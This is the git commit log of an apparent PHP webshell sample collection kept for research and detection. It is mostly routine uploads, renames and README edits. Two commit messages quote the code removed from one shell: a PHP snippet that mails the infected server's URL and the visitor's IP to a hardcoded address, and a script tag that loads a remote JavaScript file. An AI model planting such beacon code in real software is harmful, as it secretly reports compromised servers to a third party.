======================: FILES :======================
======================: BRANCHES :======================
======================: LOGINFO :======================
commit b15017f9c563c89e97f2b491a487a4f7be1a10a4
Merge: dc1129a 71812fb
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Sat Apr 18 18:01:58 2020 +0200

    Merge pull request #10 from meitar/patch-1
    
    Fix broken link to Yara-Rules repo.

commit 71812fb3e611eb36b86bf1213ea078f74c1951ed
Author: Meitar M <meitarm+github.1djyXhCkVsRYzZRk@gmail.com>
Date:   Thu Feb 13 10:28:54 2020 -0500

    Fix broken link to Yara-Rules repo.
    
    As the URL path for a file in a repository is case sensitive and the Yara-Rules repo has slightly modified its file paths, this link was broken.

commit dc1129a260b28323a8e9125cbc0c50c0b28b0a8a
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri Feb 7 18:43:44 2020 +0100

    Add shells
    
    Adds 2 unknown shells, simple PHP backdoor with several functionalities.

commit 3d284e1052295a234a527760ee79b12fa6a06c0c
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri Feb 7 18:42:39 2020 +0100

    Add files via upload
    
    Add shell

commit 2fec360073abc941d39a0158903cf3412b012813
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri Feb 8 21:47:23 2019 +0000

    Create UploadShell_026f31ce1f06adc3e1b3c69ab4f3a3cd73af01dd.php

commit fcdabb7b8216ad32e47a90f84a7974dd5540cc3b
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Sun Apr 8 15:25:07 2018 +0100

    Update README.md

commit bac33609ad41fad277e107d581f445c70a06ff17
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Sun Apr 8 15:20:57 2018 +0100

    Add Unknown PHP backdoor

commit e25dc1295031f33c7679cfa1476613663fd49803
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Sun Jul 23 17:40:18 2017 +0100

    Add more shells

commit b4b0745c3615079c3115f4a89d01cd28d1d8b2da
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Sun Jul 23 17:39:54 2017 +0100

    Add more shells

commit 86872be3baea30c996aeafaa56531a596fd6b32f
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 5 21:40:10 2017 +0100

    Update README.md

commit 241a3f9f088e69fc3f36cbe3dfb1736a6b9ccf96
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Tue Apr 25 23:32:42 2017 +0100

    Update README.md

commit 9d5165d8030ca29f4ffa29e1a7fe5a8789e9cc91
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Tue Apr 25 23:31:10 2017 +0100

    Update README.md

commit aead09d0db736aeeeaea337dc7dcc58155829763
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Tue Apr 25 23:27:38 2017 +0100

    Update README.md

commit 00f846fd0bf1cb47a280765c000cf8cb1373cd64
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Tue Apr 25 23:26:02 2017 +0100

    Update README.md
    
    Add Detection.

commit 3bcdd3de0db8283d03cd9e763f715ad327d54e9d
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Sat Oct 29 14:38:37 2016 +0100

    Update README.md
    
    Add webshellSample repo

commit 0554c2f39bd42f991db4e5737dddc34b545fcc77
Author: Bart <bartblaze@gmail.com>
Date:   Sun Sep 4 18:05:55 2016 +0100

    Upload new shells

commit b3578c37087feb2b35cabf3a3b878a6d955bb19c
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Wed Jul 27 10:55:05 2016 +0200

    Update PHP tools.md
    
    Updated FOPO deobfuscator online versions

commit 97cb8016d5d1c8cee3fbd4aa055a8723ecfeb88c
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon Jul 25 14:13:05 2016 +0200

    Rename 1n73ctionShell hash

commit 720a31c9c7bc1874ebf966a4ef8eeb3e3e2caf1f
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon Jul 25 14:12:32 2016 +0200

    Delete 1n73ctionShell_52e6c5d8abeb7cabe9cf6da8b5326694cd118adc.php

commit e2c815672f9acb7e30d24f280aebd258277a0c46
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon Jul 25 14:11:13 2016 +0200

    Rename SQLShell hash

commit a0858ac9dc06b301abd9e0b9addb30b745c1af32
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon Jul 25 14:10:03 2016 +0200

    Delete SQLShell_f53988fccaa77639305fb3daa63456c048edf961.php

commit e35dc452c066d773e86b7a5651de366534a976db
Merge: 13f7b34 d3fb533
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon Jul 25 14:08:56 2016 +0200

    Merge pull request #9 from muratyilmazlar/patch-2
    
    Deleting the logger section from shell.

commit 13f7b346f3d74eae542778318fbf3cf800fed57a
Merge: f664ecd f6a1c1e
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon Jul 25 14:04:24 2016 +0200

    Merge pull request #8 from muratyilmazlar/patch-1
    
    Deleting the logger section from shell.

commit d3fb5330c2c451a4ee84b637f75ff65c88aec41b
Author: Murat Yılmazlar <muratyilmazlar@users.noreply.github.com>
Date:   Wed Jul 20 15:24:11 2016 +0300

    Deleting the logger section from shell.
    
    that was like:
    
    <SCRIPT SRC=http://www.dcvi.net/dex.js></SCRIPT>
    
    I deleted it. So shell is no longer logging by this skids.

commit f6a1c1e0d8369092b01e6d90e3ec16b0624e7b44
Author: Murat Yılmazlar <muratyilmazlar@users.noreply.github.com>
Date:   Wed Jul 20 15:14:58 2016 +0300

    Deleting the logger section from shell.
    
    that was like this:
    <?php
    $time_shell = "".date("d/m/Y - H:i:s")."";
    $ip_remote = $_SERVER["REMOTE_ADDR"];
    $from_shellcode = 'shellgeldi@'.gethostbyname($_SERVER['SERVER_NAME']).'';
    $to_email = 'mectruy@gmail.com';
    $server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
    $linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
    $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
    @mail($to_email, $server_mail, $linkcr, $header);
     ?>
    
    I deleted it. So its not-logging anymore.

commit f664ecd652b57f05a37628f2217dc3e3a523ae81
Author: Bart Blaze <bartblaze@gmail.com>
Date:   Wed Jul 20 11:36:08 2016 +0200

    .

commit 5fe303925664a515ff6ea26cd1b0b46a983ca2a1
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri Jul 1 16:16:36 2016 +0200

    Update README.md

commit 9694c5220d1ba39bb4194ff9673de5a079df690a
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri Jun 10 15:49:30 2016 +0200

    Update PHP tools.md

commit 4e39ec3a458332948f872484ed4338654263ec7d
Author: Bart Blaze <bartblaze@gmail.com>
Date:   Fri Jun 10 15:49:37 2016 +0200

    Add + edit
    
    Add + edit

commit d0aeeb9846adcadc328fdb591443dbec268a1ead
Author: Bart Blaze <bartblaze@gmail.com>
Date:   Tue May 17 12:17:14 2016 +0200

    Edits
    
    Small edits.

commit e764087d8f3caa1b48345ae758b8b24b9015e8f8
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon May 16 20:51:52 2016 +0200

    Update README.md

commit 8ce67afbf8edc1702742ced1a574d1b90f93eadd
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon May 16 20:36:38 2016 +0200

    Create LICENSE.md

commit 6a0f048e3dbf1678c55aae740fb6ed30e5860d31
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon May 16 20:34:08 2016 +0200

    Update README.md

commit 72ff27ba5cf9bc7d55e53e2b3e7d8cbb62323144
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon May 16 20:32:07 2016 +0200

    Update README.md
    
    add php-webshells

commit 955262788f3255dfcf99db1f6267500d613245ce
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon May 16 20:29:03 2016 +0200

    Update PHP tools.md

commit b2bdfb71b3950f5316f398faae9b0541c8264e6d
Author: Bart <bartblaze@gmail.com>
Date:   Mon May 16 20:21:04 2016 +0200

    Add shells + info
    
    Added shells + info, add .gitignore, add composer.json

commit 0d96b2823f5cdfacd3c2e3b854380c8f41a2f0f7
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon May 9 13:01:12 2016 +0200

    Update README.md
    
    Added other repos

commit c7de8ce782bc17c71c5e3449d504ae89d3ac6cbb
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon May 9 11:42:54 2016 +0200

    Delete file.php

commit 3cb39201619bf65ae3d713c5006685e8e610d52d
Merge: 75a835a f524e9c
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Mon May 9 11:38:51 2016 +0200

    Merge pull request #2 from nicoder/patch-1
    
    fix typo

commit f524e9c8c2c048dcdc9ca1426f3b3044d37251fb
Author: Nicolas Dermine <nicolas.dermine@gmail.com>
Date:   Mon May 9 07:55:55 2016 +0200

    fix typo

commit 75a835a26a948a5e9e425e13be24701c5b52ddb7
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Sun May 8 00:35:59 2016 +0200

    Update PHP tools.md

commit 017703a0e0afbc301d689fb6453ad615a1344155
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 17:32:50 2016 +0200

    Delete webadmin.php

commit 2077230a6f48b5b4e9ed071b84ce0a049349957e
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 17:16:30 2016 +0200

    Update README.md

commit 61a006e5528e835b7a1f1d3581acbb274f4e4779
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 17:11:39 2016 +0200

    Update PHP tools.md

commit 15117b75b33d524a9e41e630af27e9f717d454a9
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 17:11:21 2016 +0200

    Update PHP tools.md

commit fcc6e697e8c0261f2e71838b14ba2a6efc482a45
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 17:10:20 2016 +0200

    Update PHP tools.md

commit 582b589f795958c391dd80fd4491e69f91c0fabe
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 17:07:11 2016 +0200

    Update PHP tools.md

commit 6b07ffa10b37f6f9d2bb2e798ce44c972db61dcc
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 17:06:56 2016 +0200

    Rename PHP tools to PHP tools.md

commit 78efc24b03cec027bf7f47f6be67dee2dad88d7f
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 17:06:29 2016 +0200

    Update PHP tools

commit 1965412c05410702eeb39f1d6007d1458090c573
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 16:42:43 2016 +0200

    Added files via upload

commit a2617a498b88c0a501351e3b5ed3613b1f8fb565
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 16:41:24 2016 +0200

    Added files via upload

commit 35a519e6d34a42328b68a09c7a85d5c6526c78e3
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 16:38:37 2016 +0200

    Added files via upload

commit 0ff69eaf49d481c6fa8a7b403c9c2fe5aa9b22a9
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 16:36:01 2016 +0200

    Create PHP tools

commit b9a4d0e613a72c85238f0556c37dd2c9435adfee
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 16:27:39 2016 +0200

    Create Readme.md

commit 0396a0f583d53eabe42c59dbc55ae5a9d17b7eeb
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 16:27:08 2016 +0200

    Create Readme.md

commit 54a839e1dfaac660bcf132f5f98d089daa7c8491
Author: Bart <bartblaze@users.noreply.github.com>
Date:   Fri May 6 16:26:24 2016 +0200

    Initial commit
